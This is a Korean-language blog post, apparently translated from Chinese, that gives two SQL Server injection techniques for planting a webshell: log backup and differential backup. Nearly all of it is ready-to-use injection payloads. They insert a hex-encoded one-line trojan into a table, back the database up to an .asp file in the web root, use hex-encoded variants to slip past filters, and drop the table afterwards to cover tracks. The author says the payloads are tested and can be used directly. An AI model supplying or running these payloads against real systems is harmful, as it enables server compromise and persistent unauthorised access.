sqlserver 의 두 가지 백업 getshell (건어물)

3518 단어
로그 백업 은 로그 파일 을 웹 경로 로 내 보 내 는 방법 입 니 다.
이번 에는 sqlserver 를 통 해 getshell 을 진행 하 는 두 가지 방법 을 요약 하 겠 습 니 다. payload 는 직접 가 져 와 서 사용 할 수 있 습 니 다. 더 이상 말 하지 않 고 아래 를 내 려 다 보면 끝 납 니 다.
 
우세:
1. 중복 성 이 좋 고 여러 번 백업 하 는 성 공률 이 높다.
2. 차이 백업 에 비해 셸 의 부피 가 작 습 니 다.
 
이용 조건: 최소 DBO 권한
1. 전 제 는 절대적 인 경 로 를 알 고 쓸 수 있다.
2. 라 이브 러 리 분리 안 함
3. 데이터 베 이 스 는 반드시 한 번 백업 되 어야 합 니 다.
 
 
첫 번 째 단계:
;alter database 库名 set RECOVERY FULL--

 
두 번 째 단계:
;create table 数据库名..表名(a image)--     //建表

 
 
세 번 째 단계:
;insert into 数据库名..表名(a) values (0x一句话木马)--     //插入一句话木马到表中,注意16进制

 
네 번 째 단계:
;backup database 数据库名 to disk = 'c:\www\panda.bak'--          //先手动给test1备份一遍

 
다섯 번 째 단계:
;backup log 数据库名 to disk = 'c:\www\panda.asp' with init--          //利用log备份到web路径getshell

 
 
여섯 번 째 단계:
;Drop table 数据库名..表名--     //删除表

 
 
 
차이 백업 조건: 최소 DBO 권한
 
1. 전 제 는 절대 경 로 를 알 고 경 로 는 쓸 수 있 습 니 다.
2. HTTP 500 오 류 는 사용자 정의 가 아 닙 니 다.
3. WEB 와 데이터 가 함께 있 습 니 다.그리고 데이터베이스 에% 번호 같은 것 이 존재 해 서 는 안 된다 는 것 이다. 그렇지 않 으 면 성공 하지 못 할 것 이다.
4. 데이터 양 이 많 으 면 안 됩 니 다.
 
 
첫 번 째 단계:
;backup database 库名 to disk = 'c:\bak.bak' ;--    //先手动备份一次

 
 
필터 가 걸 리 면 아래 payload 를 사용 하 십시오:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x备份路径\xx.bak backup database @a to disk=@s--     //0x备份的数据库名转换成16位进制,db_name()里面可以加数字备份不同的数据库

 
 
두 번 째 단계:
;create table 数据库名..表名(a image)--     //建立表,加字段

 
 
세 번 째 단계:
;insert into 数据库名..表名(a) values (0x一句话木马)--     //插入一句话木马到表中,注意16进制

 
네 번 째 단계:
;backup database 库名 to disk = 'c:\shell.asp' with differential , format ;--    //进行差异备份

 
 
필터 가 걸 리 면 아래 payload 를 사용 하 십시오:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x备份路径\xx.asp backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--     //备份到路径\xx.asp,前提是已得知路径,注意转换为16进制,假如备份的路径为c:\webroot\panda.asp ,访问查看是否备份getshell成功

 
 
다섯 번 째 단계:
;Drop table 数据库..表名--     //备份完getshell过后删除表

 
글 속 의 방법 과 payload 친 측 으로 사용 할 수 있 으 며, 그림 에 대해 서 는 약간의 자체 뇌 보 를 할 수 있 으 며, 주입 점 에서 조작 하면 된다.

좋은 웹페이지 즐겨찾기